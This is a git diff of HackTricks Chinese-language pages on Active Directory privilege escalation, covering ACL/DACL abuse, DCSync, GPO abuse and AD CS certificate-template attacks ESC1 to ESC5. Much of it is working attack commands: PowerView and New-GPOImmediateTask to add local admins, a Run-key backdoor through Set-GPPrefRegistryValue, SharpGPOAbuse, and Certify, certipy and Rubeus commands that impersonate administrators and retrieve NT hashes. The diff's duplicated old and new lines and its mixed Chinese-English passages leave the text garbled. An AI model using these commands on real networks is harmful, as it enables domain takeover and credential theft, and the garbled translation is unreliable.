拥有一个AD对象并对其具有`WriteDACL`权限使攻击者能够授予自己对该对象的`GenericAll`权限。这是通过ADSI操作实现的允许对该对象进行完全控制并能够修改其组成员资格。尽管如此在尝试使用Active Directory模块的`Set-Acl` / `Get-Acl` cmdlets利用这些权限时仍然存在限制。
```powershell
$ADSI = [ADSI]"LDAP://CN=test,CN=Users,DC=offense,DC=local"
$IdentityReference = (New-Object System.Security.Principal.NTAccount("spotless")).Translate([System.Security.Principal.SecurityIdentifier])
@ -116,64 +117,64 @@ $ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityRe
$ADSI.psbase.ObjectSecurity.SetAccessRule($ACE)
$ADSI.psbase.commitchanges()
```
## **域上的复制DCSync**
## **域上的复制 (DCSync)**
DCSync攻击利用域上的特定复制权限模仿域控制器并同步数据,包括用户凭据。这种强大的技术需要像`DS-Replication-Get-Changes`这样的权限允许攻击者从AD环境中提取敏感信息而无需直接访问域控制器。[**在这里了解更多关于DCSync攻击的信息。**](../dcsync.md)
DCSync 攻击利用域上的特定复制权限,模拟域控制器并同步数据,包括用户凭据。这种强大的技术需要像 `DS-Replication-Get-Changes` 这样的权限,使攻击者能够在没有直接访问域控制器的情况下,从 AD 环境中提取敏感信息。[**在这里了解更多关于 DCSync 攻击的信息。**](../dcsync.md)
## GPO委派 <a href="#gpo-delegation" id="gpo-delegation"></a>
## GPO 委派 <a href="#gpo-delegation" id="gpo-delegation"></a>
### GPO委派
### GPO 委派
委派访问以管理组策略对象GPO可能存在重大安全风险。例如如果像`offense\spotless`这样的用户被委派了GPO管理权限他们可能拥有**WriteProperty**、**WriteDacl**和**WriteOwner**等权限。这些权限可能被滥用用于恶意目的可以使用PowerView进行识别:`bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
委派管理组策略对象 (GPO) 的访问权限可能会带来重大安全风险。例如,如果用户如 `offense\spotless` 被委派 GPO 管理权限,他们可能拥有 **WriteProperty**、**WriteDacl** 和 **WriteOwner** 等权限。这些权限可能被滥用用于恶意目的,使用 PowerView 识别:`bash Get-ObjectAcl -ResolveGUIDs | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
### 枚举GPO权限
### 枚举 GPO 权限
为了识别配置错误的GPO可以链接PowerSploit的cmdlets。这允许发现特定用户有权限管理的GPO`powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
要识别配置错误的 GPO可以将 PowerSploit 的 cmdlet 链接在一起。这允许发现特定用户有权限管理的 GPO`powershell Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name} | ? {$_.IdentityReference -eq "OFFENSE\spotless"}`
**应用了特定策略的计算机**可以确定特定GPO适用于哪些计算机帮助了解潜在影响的范围。`powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
**应用特定策略的计算机**:可以解析特定 GPO 应用到哪些计算机,帮助理解潜在影响的范围。`powershell Get-NetOU -GUID "{DDC640FF-634A-4442-BC2E-C05EED132F0C}" | % {Get-NetComputer -ADSpath $_}`
**应用于特定计算机的策略**:要查看应用于特定计算机的策略,可以使用`Get-DomainGPO`等命令。
**应用于特定计算机的策略**:要查看应用于特定计算机的策略,可以使用 `Get-DomainGPO` 等命令。
**应用了特定策略的OU**:可以使用`Get-DomainOU`来识别受特定策略影响的组织单位OU
**应用特定策略的 OU**:可以使用 `Get-DomainOU` 识别受特定策略影响的组织单位 (OU)
### 滥用GPO - New-GPOImmediateTask
### 滥用 GPO - New-GPOImmediateTask
可以利用配置错误的GPO来执行代码例如通过创建即时计划任务。这可以用来将用户添加到受影响计算机上的本地管理员组显著提升权限:
配置错误的 GPO 可以被利用来执行代码,例如,通过创建一个立即的计划任务。这可以用来将用户添加到受影响机器的本地管理员组,从而显著提升权限:
```powershell
New-GPOImmediateTask -TaskName evilTask -Command cmd -CommandArguments "/c net localgroup administrators spotless /add" -GPODisplayName "Misconfigured Policy" -Verbose -Force
```
### GroupPolicy 模块 - 滥用 GPO
### GroupPolicy module - Abuse GPO
GroupPolicy 模块(如果已安装)允许创建和链接新的 GPO并设置偏好设置如注册表值以在受影响的计算机上执行后门。此方法需要更新 GPO 并要求用户登录计算机以执行:
GroupPolicy模块如果已安装允许创建和链接新的GPO并设置首选项例如注册表值以在受影响的计算机上执行后门。此方法要求更新GPO并且用户必须登录计算机以执行:
```powershell
New-GPO -Name "Evil GPO" | New-GPLink -Target "OU=Workstations,DC=dev,DC=domain,DC=io"
Set-GPPrefRegistryValue -Name "Evil GPO" -Context Computer -Action Create -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Updater" -Value "%COMSPEC% /b /c start /b /min \\dc-2\software\pivot.exe" -Type ExpandString
```
### SharpGPOAbuse - 滥用 GPO
SharpGPOAbuse 提供了一种滥用现有 GPO 的方法,通过添加任务或修改设置,而无需创建新的 GPO。工具需要修改现有 GPO 或使用 RSAT 工具创建新的 GPO然后应用更改
SharpGPOAbuse 提供了一种滥用现有 GPO 的方法,通过添加任务或修改设置,而无需创建新的 GPO。工具需要修改现有 GPO 或使用 RSAT 工具创建新的 GPO然后应用更改:
```bash
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Install Updates" --Author NT AUTHORITY\SYSTEM --Command "cmd.exe" --Arguments "/c \\dc-2\software\pivot.exe" --GPOName "PowerShell Logging"
```
### 强制策略更新
GPO 更新通常每 90 分钟发生一次。为了加快这过程,特别是在实施更改后,可以在目标计算机上使用 `gpupdate /force` 命令来强制立即更新策略。该命令确保对 GPO 的任何修改都会在等待下一个自动更新周期之前应用。
GPO 更新通常每 90 分钟发生一次。为了加快这过程,特别是在实施更改后,可以在目标计算机上使用 `gpupdate /force` 命令强制立即更新策略。此命令确保对 GPO 的任何修改在下一个自动更新周期之前立即应用。
### 内部机制
### 背后原理
检查给定 GPO 的计划任务时,如 `Misconfigured Policy`,可以确认是否添加了诸如 `evilTask`任务。这些任务是通过脚本或命令行工具创建的,旨在修改系统行为或提升权限。
在检查给定 GPO 的计划任务时,例如 `Misconfigured Policy`,可以确认添加了诸如 `evilTask`任务。这些任务是通过脚本或命令行工具创建的,旨在修改系统行为或提升权限。
任务的结构,如通过 `New-GPOImmediateTask` 生成的 XML 配置文件所示,概述了计划任务的具体内容 - 包括要执行的命令及其触发器。该文件展示了如何在 GPO 中定义和管理计划任务,提供了执行任意命令或脚本作为策略执行的方法。
任务的结构,如 `New-GPOImmediateTask` 生成的 XML 配置文件所示,概述了计划任务的具体细节,包括要执行的命令及其触发器。该文件表示如何在 GPO 中定义和管理计划任务,提供了一种作为政策执行一部分执行任意命令或脚本的方法。
### 用户和组
GPO 还允许在目标系统上操作用户和组成员资格。通过直接编辑用户和组策略文件,攻击者可以将用户添加到特权组,如本地 `administrators` 组。这是通过委派 GPO 管理权限实现的,允许修改策文件以包含新用户或更改组成员资格。
GPO 还允许在目标系统上操纵用户和组的成员资格。通过直接编辑用户和组政策文件,攻击者可以将用户添加到特权组,如本地 `administrators` 组。这是通过委派 GPO 管理权限实现的,允许修改策文件以包含新用户或更改组成员资格。
用户和组的 XML 配置文件概述了这些更改是如何实施的。通过向该文件添加条目,特定用户可以在受影响的系统中获得提升的权限。这种方法通过 GPO 操纵提供了特权升级的直接途径。
用户和组的 XML 配置文件概述了这些更改是如何实施的。通过向该文件添加条目,可以授予特定用户在受影响系统上的提升权限。这种方法提供了一种通过 GPO 操作进行权限提升的直接途径。
此外,还可以考虑其他执行代码或保持持久性的方法,例如利用登录/注销脚本、修改注册表键以进行自启动、通过 .msi 文件安装软件或编辑服务配置。这些技术提供了通过滥用 GPO 来保持访问并控制目标系统的各种途径。
此外,还可以考虑其他执行代码或维持持久性的方式,例如利用登录/注销脚本、修改注册表键以实现自动运行、通过 .msi 文件安装软件或编辑服务配置。这些技术提供了通过滥用 GPO 维持访问和控制目标系统的各种途径。
## 参考资料
## 参考文献
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces)
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/privileged-accounts-and-token-privileges)
@ -182,3 +183,18 @@ GPO 还允许在目标系统上操作用户和组成员资格。通过直接编
* [https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/)
* [https://adsecurity.org/?p=3658](https://adsecurity.org/?p=3658)
* [https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_](https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryaccessrule.-ctor?view=netframework-4.7.2#System\_DirectoryServices\_ActiveDirectoryAccessRule\_\_ctor\_System\_Security\_Principal\_IdentityReference\_System\_DirectoryServices\_ActiveDirectoryRights\_System\_Security\_AccessControl\_AccessControlType\_)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,126 +1,127 @@
# AD CS域提升
# AD CS Domain Escalation
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
**这是有关升级技术部分的摘要**
**这是对帖子中升级技术部分的总结**
- [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf)
- [https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
- [https://github.com/ly4k/Certipy](https://github.com/ly4k/Certipy)
* [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified\_Pre-Owned.pdf)
* [https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
* [https://github.com/ly4k/Certipy](https://github.com/ly4k/Certipy)
## 配置错误的证书模板 - ESC1
## Misconfigured Certificate Templates - ESC1
### 解释
### Explanation
### 解释配置错误的证书模板 - ESC1
### Misconfigured Certificate Templates - ESC1 Explained
- 企业CA向低特权用户授予注册权限。
- 不需要经理批准。
- 不需要来自授权人员的签名。
- 证书模板上的安全描述符过于宽松,允许低特权用户获取注册权限。
- 证书模板配置为定义促进身份验证的EKU
- 包括扩展密钥用途EKU标识如客户端身份验证OID 1.3.6.1.5.5.7.3.2、PKINIT客户端身份验证1.3.6.1.5.2.3.4、智能卡登录OID 1.3.6.1.4.1.311.20.2.2、任何目的OID 2.5.29.37.0或无EKU子CA
- 模板允许请求者在证书签名请求CSR中包含subjectAltName
- 如果存在Active DirectoryAD会优先使用证书中的subjectAltNameSAN进行身份验证。这意味着通过在CSR中指定SAN可以请求证书以冒充任何用户例如域管理员。请求者是否可以指定SAN在证书模板的AD对象中通过`mspki-certificate-name-flag`属性指示。此属性是一个位掩码,`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`标志的存在允许请求者指定SAN。
* **企业 CA 授予低权限用户注册权。**
* **不需要经理批准。**
* **不需要授权人员的签名。**
* **证书模板上的安全描述符过于宽松,允许低权限用户获得注册权。**
* **证书模板配置为定义促进身份验证的 EKU**
* 包含客户端身份验证 (OID 1.3.6.1.5.5.7.3.2)、PKINIT 客户端身份验证 (1.3.6.1.5.2.3.4)、智能卡登录 (OID 1.3.6.1.4.1.311.20.2.2)、任何目的 (OID 2.5.29.37.0) 或无 EKU (SubCA) 等扩展密钥使用 (EKU) 标识符
* **模板允许请求者在证书签名请求 (CSR) 中包含 subjectAltName**
* 如果存在Active Directory (AD) 在证书中优先考虑 subjectAltName (SAN) 进行身份验证。这意味着通过在 CSR 中指定 SAN可以请求证书以冒充任何用户例如域管理员。请求者是否可以指定 SAN 在证书模板的 AD 对象中通过 `mspki-certificate-name-flag` 属性指示。该属性是一个位掩码,存在 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 标志允许请求者指定 SAN。
{% hint style="danger" %}
所述配置允许低特权用户请求具有任意选择的SAN的证书从而通过Kerberos或SChannel进行任何域主体的身份验证。
上述配置允许低权限用户请求具有任何选择的 SAN 的证书,从而通过 Kerberos 或 SChannel 作为任何域主体进行身份验证。
{% endhint %}
有时启用此功能以支持产品或部署服务的即时生成HTTPS或主机证书,或由于缺乏理解。
此功能有时被启用以支持产品或部署服务的 HTTPS 或主机证书的即时生成,或由于缺乏理解。
值得注意的是,使用此选项创建证书会触发警告,当复制现有证书模板(例如启用了`CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`的`WebServer`模板然后修改以包含身份验证OID时情况并非如此
需要注意的是,使用此选项创建证书会触发警告,而当复制现有证书模板(例如,启用了 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT``WebServer` 模板)并修改以包含身份验证 OID 时则不会
### 滥用
### Abuse
要**查找易受攻击的证书模板**,您可以运行:
```bash
Certify.exe find /vulnerable
certipy find -username john@corp.local -password Passw0rd -dc-ip 172.16.126.128
```
要**利用这个漏洞冒充管理员**,可以运行:
要**利用漏洞冒充管理员**,可以运行:
```bash
Certify.exe request /ca:dc.domain.local-DC-CA /template:VulnTemplate /altname:localadmin
certipy req -username john@corp.local -password Passw0rd! -target-ip ca.corp.local -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
```
然后,您可以将生成的**证书转换为`.pfx`**格式,并再次使用它来**使用Rubeus或certipy进行身份验证**
然后您可以将生成的 **证书转换为 `.pfx`** 格式,并再次使用 **Rubeus 或 certipy** 进行 **身份验证**
```bash
Rubeus.exe asktgt /user:localdomain /certificate:localadmin.pfx /password:password123! /ptt
certipy auth -pfx 'administrator.pfx' -username 'administrator' -domain 'corp.local' -dc-ip 172.16.19.100
```
Windows 二进制文件 "Certreq.exe" 和 "Certutil.exe" 可用于生成 PFXhttps://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee
The Windows binaries "Certreq.exe" & "Certutil.exe" 可以用来生成 PFX: https://gist.github.com/b4cktr4ck2/95a9b908e57460d9958e8238f85ef8ee
可以通过运行以下 LDAP 查询来枚举 AD Forest 配置架构中的证书模板,特别是那些不需要批准或签名、具有客户端身份验证或智能卡登录 EKU并启用了 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 标志的证书模板
在 AD Forest 的配置架构中枚举证书模板,特别是那些不需要批准或签名、具有客户端身份验证或智能卡登录 EKU启用了 `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` 标志的,可以通过运行以下 LDAP 查询来执行
```
(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2)(pkiextendedkeyusage=1.3.6.1.5.2.3.4)(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*)))(mspkicertificate-name-flag:1.2.840.113556.1.4.804:=1))
```
## 配置错误的证书模板 - ESC2
## Misconfigured Certificate Templates - ESC2
### 解释
### Explanation
第二种滥用场景是第一种的变体:
第二个滥用场景是第一个场景的变体:
1. 企业 CA 向低权限用户授予注册权限。
2. 禁用经理批准的要求。
3. 省略了授权签名的需求
4. 证书模板上的过于宽松的安全描述符授予低权限用户证书注册权限。
5. **证书模板被定义为包含 Any Purpose EKU 或没有 EKU。**
1. 企业 CA 授予低权限用户注册权限。
2. 禁用经理批准的要求。
3. 省略授权签名的需要
4. 证书模板上的安全描述符过于宽松,授予低权限用户证书注册权限。
5. **证书模板被定义为包含任何目的 EKU 或没有 EKU。**
**Any Purpose EKU** 允许攻击者为**任何目的**获取证书,包括客户端认证、服务器认证、代码签名等。可以使用与 **ESC3 中使用的相同技术**来利用这种情况
**任何目的 EKU** 允许攻击者为 **任何目的** 获取证书,包括客户端身份验证、服务器身份验证、代码签名等。可以使用与 **ESC3** 相同的 **技术** 来利用此场景
没有 **EKUs** 的证书,作为下级 CA 证书,可以被滥用为**任何目的**,也可以**用于签署新证书**。因此,攻击者可以利用下级 CA 证书指定新证书中的任意 EKUs 或字段。
具有 **无 EKU** 的证书,作为下级 CA 证书,可以被用于 **任何目的**,并且 **也可以用来签署新证书**。因此,攻击者可以利用下级 CA 证书指定任意 EKU 或字段在新证书中
然而,为**域认证**创建的新证书如果下级 CA 未被**`NTAuthCertificates`**对象信任,则将无法正常工作,这是默认设置。尽管如此,攻击者仍然可以创建**具有任何 EKU 和任意证书值**的新证书。这些可能会被潜在地**滥用**于各种目的(例如代码签名、服务器认证等),并且可能对网络中的其他应用程序(如 SAML、AD FS 或 IPSec产生重大影响。
然而,如果下级 CA 未被 **`NTAuthCertificates`** 对象信任(这是默认设置),则为 **域身份验证** 创建的新证书将无法正常工作。尽管如此,攻击者仍然可以创建 **具有任何 EKU** 和任意证书值的新证书。这些证书可能会被 **滥用** 用于广泛的目的(例如,代码签名、服务器身份验证等),并可能对网络中其他应用程序(如 SAML、AD FS 或 IPSec产生重大影响。
要枚举符合 AD Forest 配置模式中此场景的模板,可以运行以下 LDAP 查询:
要枚举与此场景匹配的模板,可以运行以下 LDAP 查询:
```
(&(objectclass=pkicertificatetemplate)(!(mspki-enrollmentflag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-rasignature=*)))(|(pkiextendedkeyusage=2.5.29.37.0)(!(pkiextendedkeyusage=*))))
```
## 配置错误的注册代理模板 - ESC3
## Misconfigured Enrolment Agent Templates - ESC3
### 解释
### Explanation
种情况类似于前两种,但是滥用了**不同的 EKU**(证书请求代理)和**2个不同的模板**因此有2组要求
个场景与第一个和第二个场景类似,但**利用**了**不同的 EKU**(证书请求代理)和**两个不同的模板**(因此有两组要求),
**证书请求代理 EKU**OID 1.3.6.1.4.1.311.20.2.1),在微软文档中称为**注册代理**,允许主体**代表另一个用户**为**证书**申请**注册**。
**证书请求代理 EKU**OID 1.3.6.1.4.1.311.20.2.1),在 Microsoft 文档中称为**注册代理**,允许一个主体**代表另一个用户**进行**证书注册**。
**“注册代理”**在这种**模板**中注册,并使用生成的**证书共同签署代表其他用户的 CSR**。然后**发送**共同签署的 CSR 到 CA在**允许“代表注册”的模板**中注册CA 会回复一个**属于“其他”用户的证书**。
**“注册代理”**在这样的**模板**中注册,并使用生成的**证书代表其他用户共同签署 CSR**。然后,它将**共同签署的 CSR**发送到 CA注册一个**允许“代表注册”的模板**CA 返回一个**属于“其他”用户的证书**。
**要求 1:**
**Requirements 1:**
* 企业 CA 授予低权用户注册权
* 不需要经理批准
* 不需要授权签名
* 证书模板的安全描述符过于宽松,授予低权用户注册权
* 证书模板包证书请求代理 EKU允许代表其他主体请求其他证书模板。
* 企业 CA 授予低权用户注册权。
* 省略了经理批准的要求
* 没有授权签名的要求
* 证书模板的安全描述符过于宽松,授予低权用户注册权。
* 证书模板包证书请求代理 EKU允许代表其他主体请求其他证书模板。
**要求 2:**
**Requirements 2:**
* 企业 CA 授予低权用户注册权
* 绕过经理批准。
* 模板的模式版本为 1 或超过 2并指定了一个需要证书请求代理 EKU 的应用程序策略发要求。
* 企业 CA 授予低权用户注册权。
* 经理批准被绕过
* 模板的架构版本为 1 或超过 2并指定了需要证书请求代理 EKU 的应用程序策略发要求。
* 证书模板中定义的 EKU 允许域身份验证。
* CA 上未应用注册代理的限制。
* CA 上未对注册代理应用限制。
### 滥用
### Abuse
您可以使用 [**Certify**](https://github.com/GhostPack/Certify) 或 [**Certipy**](https://github.com/ly4k/Certipy) 来滥用这种情况
您可以使用 [**Certify**](https://github.com/GhostPack/Certify) 或 [**Certipy**](https://github.com/ly4k/Certipy) 来利用此场景
```bash
# Request an enrollment agent certificate
Certify.exe request /ca:DC01.DOMAIN.LOCAL\DOMAIN-CA /template:Vuln-EnrollmentAgent
@ -134,39 +135,39 @@ certipy req -username john@corp.local -password Pass0rd! -target-ip ca.corp.loca
# Use Rubeus with the certificate to authenticate as the other user
Rubeu.exe asktgt /user:CORP\itadmin /certificate:itadminenrollment.pfx /password:asdf
```
**允许**获得**注册代理证书**的**用户**,允许注册代理进行注册的模板,以及注册代理可以代表的**帐户**可以受到企业CA的限制。这可以通过打开`certsrc.msc` **快捷方式****右键单击CA****单击属性**,然后**导航**到“注册代理”选项卡来实现。
The **用户** who are allowed to **获取** an **注册代理证书**, the templates in which enrollment **代理** are permitted to enroll, and the **账户** on behalf of which the enrollment agent may act can be constrained by enterprise CAs. This is achieved by opening the `certsrc.msc` **管理单元**, **右键点击 CA**, **点击属性**, and then **导航** to the “Enrollment Agents” tab.
然而值得注意的是CA的**默认**设置是“**不限制注册代理**”。当管理员启用对注册代理的限制时,将其设置为“限制注册代理”,默认配置仍然非常宽松。它允许**所有人**访问并在所有模板中进行注册。
However, it is noted that the **默认** setting for CAs is to “**不限制注册代理**.” When the restriction on enrollment agents is enabled by administrators, setting it to “Restrict enrollment agents,” the default configuration remains extremely permissive. It allows **所有人** access to enroll in all templates as anyone.
## 可脆弱的证书模板访问控制 - ESC4
## Vulnerable Certificate Template Access Control - ESC4
### **解释**
**证书模板**上的**安全描述符**定义了特定**AD主体**对模板拥有的**权限**。
The **安全描述符** on **证书模板** defines the **权限** specific **AD 实体** possess concerning the template.
如果**攻击者**具有足够的**权限**来**更改**一个**模板**并**实施**在**前面章节**中概述的任何**可利用的配置错误**,则可能促成特权升级。
Should an **攻击者** possess the requisite **权限** to **更改** a **模板** and **建立** any **可利用的错误配置** outlined in **之前的部分**, privilege escalation could be facilitated.
适用于证书模板的显着权限包括:
Notable permissions applicable to certificate templates include:
* **所有者:**授予对对象的隐式控制,允许修改任何属性。
* **完全控制:**允许完全控制对象,包括修改任何属性的能力。
* **WriteOwner**允许将对象的所有者更改为攻击者控制下的主体。
* **WriteDacl**允许调整访问控制,可能授予攻击者完全控制。
* **WriteProperty**授权编辑任何对象属性。
* **所有者:** Grants implicit control over the object, allowing for the modification of any attributes.
* **完全控制:** Enables complete authority over the object, including the capability to alter any attributes.
* **写入所有者:** Permits the alteration of the object's owner to a principal under the attacker's control.
* **写入 DACL:** Allows for the adjustment of access controls, potentially granting an attacker FullControl.
* **写入属性:** Authorizes the editing of any object properties.
### 滥用
类似于先前的特权升级的一个示例:
An example of a privesc like the previous one:
<figure><img src="../../../.gitbook/assets/image (814).png" alt=""><figcaption></figcaption></figure>
ESC4是指用户对证书模板具有写权限。例如这可以被滥用以覆盖证书模板的配置使模板容易受到ESC1的影响。
ESC4 is when a user has write privileges over a certificate template. This can for instance be abused to overwrite the configuration of the certificate template to make the template vulnerable to ESC1.
如上路径所示,只有`JOHNPC`拥有这些权限,但我们的用户`JOHN`具有新的`AddKeyCredentialLink`边缘到`JOHNPC`。由于这个技术与证书有关,我也实施了这个攻击,这被称为[Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab)。这里是Certipy的`shadow auto`命令的一小部分用于检索受害者的NT哈希。
As we can see in the path above, only `JOHNPC` has these privileges, but our user `JOHN` has the new `AddKeyCredentialLink` edge to `JOHNPC`. Since this technique is related to certificates, I have implemented this attack as well, which is known as [Shadow Credentials](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab). Heres a little sneak peak of Certipys `shadow auto` command to retrieve the NT hash of the victim.
```bash
certipy shadow auto 'corp.local/john:Passw0rd!@dc.corp.local' -account 'johnpc'
```
**Certipy** 可以使用一条命令覆盖证书模板的配置。默认情况下Certipy会覆盖配置以使其容易受到 ESC1 的攻击。我们还可以指定 `-save-old` 参数来保存旧的配置,这在攻击后恢复配置时会很有用。
**Certipy** 可以通过一个命令覆盖证书模板的配置。默认情况下Certipy 将覆盖配置,使其对 ESC1 **易受攻击**。我们还可以指定 **`-save-old` 参数以保存旧配置**,这在我们攻击后 **恢复** 配置时将非常有用。
```bash
# Make template vuln to ESC1
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -save-old
@ -177,37 +178,37 @@ certipy req -username john@corp.local -password Passw0rd -ca corp-DC-CA -target
# Restore config
certipy template -username john@corp.local -password Passw0rd -template ESC4-Test -configuration ESC4-Test.json
```
## 脆弱的PKI对象访问控制 - ESC5
## Vulnerable PKI Object Access Control - ESC5
### 解释
### Explanation
相互连接的基于ACL的关系网络涵盖了除了证书模板和证书颁发机构之外的多个对象可能会影响整个AD CS系统的安全性。这些对象对安全性有重大影响,包括:
广泛的基于ACL的关系网络包括证书模板和证书颁发机构之外的多个对象可能会影响整个AD CS系统的安全性。这些对象可能显著影响安全性,包括:
- CA服务器的AD计算机对象可能会通过S4U2Self或S4U2Proxy等机制而受损
- CA服务器的RPC/DCOM服务器。
- 特定容器路径`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`内的任何后代AD对象或容器。该路径包括但不限于证书模板容器、证书颁发机构容器、NTAuthCertificates对象和Enrollment Services容器
* CA服务器的AD计算机对象可能通过S4U2Self或S4U2Proxy等机制被攻陷
* CA服务器的RPC/DCOM服务器。
* 在特定容器路径`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`内的任何后代AD对象或容器。该路径包括但不限于证书模板容器、认证机构容器、NTAuthCertificates对象和注册服务容器等容器和对象
如果低权限攻击者设法控制这些关键组件中的任何一个PKI系统的安全性可能会受到损害
如果低权限攻击者设法控制这些关键组件中的任何一个PKI系统的安全性可能会受到威胁
## EDITF\_ATTRIBUTESUBJECTALTNAME2 - ESC6
### 解释
### Explanation
